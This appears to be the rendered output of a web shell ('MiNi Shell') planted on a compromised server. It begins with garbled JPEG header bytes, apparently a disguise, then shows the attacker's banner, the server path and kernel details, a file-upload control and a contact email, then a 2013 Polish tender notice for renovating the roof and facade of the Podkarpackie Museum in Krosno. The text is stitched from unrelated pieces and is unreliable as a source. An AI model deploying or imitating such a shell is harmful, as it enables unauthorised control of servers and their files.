JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/170518-N-2013.html

<p class="kh_header"><b>Krosno: Przygotowanie kompleksowego projektu  remontu dachu i elewacji  pt. Remont więźby dachowej, wymiana pokrycia dachu oraz remont elewacji w zabytkowym budynku Muzeum Podkarpackiego w Krośnie</b><br>
<b>Numer ogłoszenia: 170518 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podkarpackie w Krośnie , ul. Piłsudskiego 16, 38-400 Krosno, woj. podkarpackie, tel. 013 4321376, faks 013 4324301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie kompleksowego projektu  remontu dachu i elewacji  pt. Remont więźby dachowej, wymiana pokrycia dachu oraz remont elewacji w zabytkowym budynku Muzeum Podkarpackiego w Krośnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie  inwentaryzacji architektoniczno- budowlanej więźby dachowej oraz elewacji budynku Muzeum Podkarpackiego Krośnie, dokumentacji projektowej (projekt budowlany),  wykonawczej (projekt wykonawczy) wraz z kosztorysem inwestorskim remontu konstrukcji więźby dachowej wraz z wymianą pokrycia dachowego oraz remontu elewacji  oraz STWiOR wraz z wymaganymi prawem pozwoleniami i opiniami .
Szczegółowy opis przedmiotu zamówienia
Dane wyjściowe do projektowania.
Pałac Biskupi z XIV w., dobudowane skrzydła z XIX i XX w. Obecnie siedziba Muzeum Podkarpackiego w Krośnie, najcenniejszy zabytek architektury rezydencjonalnej w regionie, wpisany do rejestru zabytków  pod numerem A-52, nieruchomość ujawniona w księdze wieczystej KS1K 00067784/9 w Sądzie Rejonowym w Krośnie.
Szacunkowa powierzchnia dachu obiektu - ok. 1150 m 2
Szacunkowa powierzchnia elewacji obiektu - ok. 1700 m2
Poddasze częściowo zagospodarowane, posiadające instalacje elektryczne, c.o. i okablowanie systemem antywłamaniowym i pożarowym. Na poddaszu usytuowana jest centrala klimatyzacyjno-wentylacyjna z okablowaniem. Na elewacji budynku zamontowane kamery oświetlenie zewnętrzne wraz z  okablowaniem  oraz sieć teletechniczna.
W projekcie należy uwzględnić powyższe instalacje i dostosować  do istniejących systemów oraz zapewnić w rozwiązaniu architektonicznym odpowiednią estetykę obiektu zabytkowego.
Zamawiający zaleca przeprowadzenie wizji lokalnej obiektu
1.Przedmiot zamówienia obejmuje opracowanie kpl dokumentacji tj.
inwentaryzacji architektoniczno-budowlanej więźby dachowej i elewacji budynku, projektu budowlanego, projektu wykonawczego,  kosztorysu inwestorskiego remontu konstrukcji więźby dachowej wraz z wymianą pokrycia dachowego i remontu elewacji, przedmiaru robót , STWiOR. Przed wyborem technologii realizacji projektowanych robót Wykonawca przedstawi Zamawiającemu aspekty ekonomiczne wybranej technologii i uzgodni ją Zamawiającym.
Przed przystąpieniem do sporządzania dokumentacji projektowej należy przedstawić szczegółową koncepcję rozwiązań celem uzyskania decyzji Wojewódzkiego Konserwatora Ochrony Zabytków. Zamawiający wystąpił z pismem do Wojewódzkiego Urzędu Ochrony Zabytków w Przemyślu Delegatura w Krośnie, pismem z dnia 14 lutego 2013 r. i przedstawił szczegółowy istniejący stan ( w załączeniu treść wystąpienia) Muzeum Podkarpackie w Krośnie zamierza przygotować pełną dokumentację architektoniczno-budowlaną  dotyczącą  konstrukcji dachu i jego pokrycia oraz elewacji zewnętrznej. 
Budynek Muzeum Podkarpackiego w Krośnie jest obiektem zabytkowym, wpisanym do rejestru zabytków  pod nr A-52 z dnia 25.11.1952 r.. Istniejące pokrycie dachu jest w bardzo złym stanie technicznym, nieszczelne rynny i rury spustowe  oraz obróbki gzymsów powodują zaciekanie wody na gzyms podokapowy i na elewację. Elewacja  na całym budynku posiada liczne spękania ( w szczególności od strony ul. Piłsudskiego i dziedzińca) . W złym stanie technicznym znajduje się również północna ściana Pałacu Biskupiego. Wzmocnienia oraz częściowej wymiany elementów wymaga drewniana więźba w celu dostosowania jej do warunków technicznych związanych z pokryciem blachą miedzianą (zapewnienie odpowiedniej sztywności). W tym celu  zamierzamy  wykonać inwentaryzacje architektoniczno-budowlaną dachu wraz z elewacją  i na jej podstawie opracować kompleksowy projekt robót remontowych. Obejmie on wzmocnienie konstrukcji dachu i wymianę zniszczonych elementów,  wymianę istniejącego pokrycia dachu. Zamiarem naszym jest wzmocnienie konstrukcyjne murów wraz z przywróceniem estetyki obiektu. W założeniach utrzymujemy dotychczasowe pokrycie dachu i zewnętrzną kolorystkę obiektu. Całość dokumentacji winna być sporządzona z zachowaniem obowiązujących norm, przepisów ustawy Prawo budowlane, przepisów bhp , ppoż i sanitarno-higienicznych oraz obowiązujących przepisów  dotyczących obiektów zabytkowych z uwzględnieniem niezbędnych branż.
2. Kompletną dokumentację należy przekazać w wersji papierowej w ilości 5 egz.,
i elektronicznej (PDF)  w ilości 2 płytek CD wraz z oświadczeniem o jej kompletności oraz zgodności z umową i obowiązującymi przepisami i normami.
3. Prace projektowe należy wykonać zgodnie z:
Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 27.04.2012 r., poz. 462),Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. nr 202, poz.2072 ze zm.), Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz.690 ze zm),  Ustawą   z dnia 7 lipca 1994 r. Prawo budowlane ( tekst j. z 2010 r., nr 243, poz. 1623 ze zm),  Wytycznymi  Konserwatora Zabytków -  Delegatura w Krośnie  Aktualnymi aktami prawnymi, przepisami oraz normami państwowymi i branżowymi,
Przedmiot zamówienia zostanie opracowany przez Wykonawcę z uwzględnieniem podziału szczegółowego na grupy, klasy i kategorie określone w rozporządzeniu w sprawie Wspólnego Słownika Zamówień w rozwiązaniach projektowych będą zastosowane wyroby budowlane, materiały i urządzenia dopuszczone do obrotu i powszechnego stosowania. Wyroby zastosowane do grupy jednostkowego stosowania będą mogły być zastosowane w dokumentacji projektowej jedynie po uzyskaniu akceptacji Zamawiającego. W dokumentacji projektowej określone zostaną parametry techniczne i wymagania funkcjonalne zastosowanych wyrobów. W celu zapewnienia zasad uczciwej konkurencji Wykonawca zobowiązuje się, w przypadkach o których mowa w art.29 ust.3 ustawy z dnia 29 stycznia 2004 r.  prawo zamówień publicznych  (Dz. U. z 2010 Nr 113, poz. 759 z póź. zm.) do każdorazowego użycia sformułowania lub równoważne i określenia wymagań, co do równoważności materiałów czy urządzeń tj. do szczegółowego opisania równoważności.
III. Postanowienia końcowe
1.W ramach zawartej umowy na opracowanie dokumentacji Wykonawca zobowiązuje się do dwukrotnego przeszacowania wartości kosztorysowej, bowiem realizacja robót przewidywana jest w  dwóch etapach  dach  a następnie elewacja.
2.Wykonawca zobowiązuje się pełnić  bezpłatnie nadzór autorski, na żądanie Zamawiającego z częstotliwością jeden nadzór na miesiąc do zakończenia inwestycji.
3.Wykonawca w imieniu Zamawiającego obowiązany jest  do uzyskania wszelkich warunków technicznych, uzgodnień i pozwoleń, opinii i decyzji niezbędnych do opracowania przedmiotowej dokumentacji projektowej.
4.Wszelkie  uzgodnienia dokumentacji projektowej  wymagane obowiązującymi  aktualnie (na dzień opracowania dokumentacji) przepisami w tym uzgodnienia  wykonuje i uzyskuje Wykonawca we własnym zakresie.
5.Wykonawca w imieniu Zamawiającego zobowiązany jest wystąpić z wnioskiem o wydanie decyzji Konserwatora i decyzji o pozwoleniu na budowę  do złożenia wniosku ze wszystkimi wymaganymi dokumentami w stosownym urzędzie.
6.O konieczności przygotowania przez Zamawiającego wszelkich dokumentów niezbędnych do uzyskania stosownych decyzji  Wykonawca powiadomi Zamawiającego min. 3 dni robocze przed złożeniem wniosków w stosownym urzędzie.
7.Wszelkie koszty i opłaty związane z uzgodnieniem dokumentacji oraz koszty związane z uzyskaniem decyzji stosownych organów  ponosi Wykonawca.
8.Termin opracowania dokumentacji wraz z pozwoleniem na budowę upływa z dniem 31 października 2013 r.
9.Za zakończenie procesu projektowego Zamawiający uznaje pisemne przekazanie przez Wykonawcę kompletnej dokumentacji wraz z wymaganymi opiniami decyzją pozwolenie na budowę ( protokół zdawczo-odbiorczy).
10.W przypadku wskazania przez stosowny urząd braków lub błędów w przedłożonej dokumentacji Wykonawca zobowiązany jest do uzupełnienia dokumentacji w wyznaczonym przez urząd terminie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana na podstawie oświadczenia Wykonawcy w złożonej ofercie o spełnianiu tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana na podstawie oświadczenia Wykonawcy w złożonej ofercie o spełnianiu tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana na podstawie oświadczenia Wykonawcy w złożonej ofercie o spełnianiu tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia Wykonawcy w złożonej ofercie o spełnianiu tego warunku oraz 
wykazu osób (załącznik nr 5 do SIWZ), które  będą uczestniczyć w wykonywaniu zamówienia, w szczególności  odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także  zakresu wykonywanych przez nie czynności   oraz informacji o podstawie do dysponowania tymi osobami dla:
- nie mniej niż jednej osoby uprawnionej do projektowania w specjalności architektonicznej;
- nie  mniej niż jednej osoby uprawnionej do projektowania w specjalności konstrukcyjnej;
-nie mniej niż jednej osoby uprawnionej do projektowania w specjalności elektrycznej;
-nie mniej niż jednej osoby uprawnionej do projektowania w specjalności teletechnicznej.
Do oferty należy dołączyć oświadczenie Wykonawcy (Załącznik nr 6 do SIWZ), że zaproponowana osoba posiada wymagane uprawnienia  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana na podstawie oświadczenia Wykonawcy w złożonej ofercie o spełnianiu tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty, oświadczeń i dokumentów składających się na ofertę, o ile pełnomocnictwo to nie wynika z innych dokumentów dołączonych do oferty. Pełnomocnictwo należy przedstawić w formie oryginału, podpisane przez Wykonawcę lub formie kserokopii poświadczonej za zgodność z oryginałem przez notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum  Podkarpackie w Krośnie
ul. Piłsudskiego 16, 38-400 Krosno
pok. 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2013 godzina 10:30, miejsce: Muzeum  Podkarpackie w Krośnie
ul. Piłsudskiego 16, 38-400 Krosno
pok. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com